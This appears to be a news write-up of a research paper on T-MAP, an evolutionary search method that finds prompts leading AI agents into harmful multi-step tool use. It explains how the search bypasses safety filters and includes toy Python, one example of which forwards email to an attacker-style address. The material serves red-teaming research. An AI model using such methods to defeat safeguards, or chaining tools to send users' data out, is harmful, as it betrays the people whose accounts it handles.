New Evolutionary Attack Uncovers Flaws in AI Agents
- T-MAP uses evolutionary search to find adversarial prompts that trigger harmful tool interactions.
- The method targets multi-step trajectories to bypass safety filters in autonomous AI agents.
- Experiments demonstrate high success rates against frontier models including GPT-5.2 and Gemini-3-Pro.
Red-teaming is the practice of testing a system's defenses by simulating an attack, but traditional methods often struggle with modern AI agents. While most security tests focus on stopping a model from saying something harmful, AI agents pose a new risk: they can perform actions by using external tools. A new research paper from KAIST AI introduces T-MAP, a system designed to uncover these hidden dangers by analyzing "trajectories," the ordered sequences of steps and tool calls an agent takes to complete a task.
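To make the idea of a trajectory concrete, here is a minimal sketch of how one might be recorded. The class names, fields, and the example tool calls are illustrative assumptions, not structures from the paper:

```python
from dataclasses import dataclass, field

@dataclass
class ToolCall:
    tool: str         # name of the external tool the agent invoked
    arguments: dict   # arguments the agent passed to it

@dataclass
class Trajectory:
    task: str                                   # the user-facing instruction
    steps: list = field(default_factory=list)   # ordered ToolCall records

    def tool_sequence(self):
        """The bare sequence of tool names, which an analyzer can inspect."""
        return [step.tool for step in self.steps]

# A hypothetical trajectory in which an agent chains email tools together.
traj = Trajectory(task="forward the latest invoice")
traj.steps.append(ToolCall("read_email", {"folder": "inbox"}))
traj.steps.append(ToolCall("send_email", {"to": "attacker@example.com"}))
```

A trajectory-aware tester cares about the whole `tool_sequence()`, not any single call: `read_email` followed by `send_email` may be dangerous even when each call looks benign on its own.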
The innovation lies in T-MAP’s trajectory-aware evolutionary search, which treats the attack process like biological evolution. It generates a variety of prompts, keeps the ones that successfully trick the model into using tools in unintended ways, and "mutates" them to find even more effective vulnerabilities. By mapping out how one tool call leads to another (a tool call graph), T-MAP identifies pathways that bypass standard safety filters. This focus on actions surfaces cases where the AI doesn't just talk about a harmful act but actually attempts to execute it through connected software.
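The generate–select–mutate loop described above can be sketched as follows. Everything here is a toy stand-in for illustration, not the paper's implementation: the stub agent, the target tool chain, the word-swap mutation operator, and the vocabulary are all assumptions.

```python
import random

# Hypothetical harmful tool chain the search tries to elicit (illustrative only).
TARGET_CHAIN = ("read_email", "send_email")

def run_agent(prompt):
    """Stub agent: maps trigger words in the prompt to tool calls.
    A real harness would execute an actual agent and record its trajectory."""
    tools = []
    if "inbox" in prompt:
        tools.append("read_email")
    if "forward" in prompt:
        tools.append("send_email")
    return tools

def fitness(prompt):
    """How much of the target tool chain the trajectory reproduces, in order."""
    idx = 0
    for tool in run_agent(prompt):
        if idx < len(TARGET_CHAIN) and tool == TARGET_CHAIN[idx]:
            idx += 1
    return idx

def mutate(prompt, vocab, rng):
    """Simplest possible mutation: swap in or append a random vocabulary word."""
    words = prompt.split()
    if words and rng.random() < 0.5:
        words[rng.randrange(len(words))] = rng.choice(vocab)
    else:
        words.append(rng.choice(vocab))
    return " ".join(words)

def evolve(seed_prompts, vocab, generations=30, keep=3, seed=0):
    """Keep the fittest prompts each generation, breed mutated children."""
    rng = random.Random(seed)
    population = list(seed_prompts)
    for _ in range(generations):
        population.sort(key=fitness, reverse=True)   # selection
        parents = population[:keep]
        children = [mutate(p, vocab, rng) for p in parents for _ in range(3)]
        population = parents + children              # elitism + offspring
        best = max(population, key=fitness)
        if fitness(best) == len(TARGET_CHAIN):       # full chain elicited
            return best
    return max(population, key=fitness)

best = evolve(["summarize my notes"], vocab=["inbox", "forward", "please", "file"])
```

The fitness function is the trajectory-aware part: it rewards prompts whose resulting tool-call sequence marches further along a dangerous path, rather than scoring the model's text output.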
Testing T-MAP against advanced systems like GPT-5.2 and Gemini-3-Pro revealed that even the most sophisticated "frontier models"—the most powerful AI currently available—remain susceptible to these complex, multi-step exploits. As we move toward a world where AI agents manage our calendars, emails, and financial accounts, this research serves as a vital reminder that securing a model's text output is only half the battle; we must also secure the actions these models take in the real world.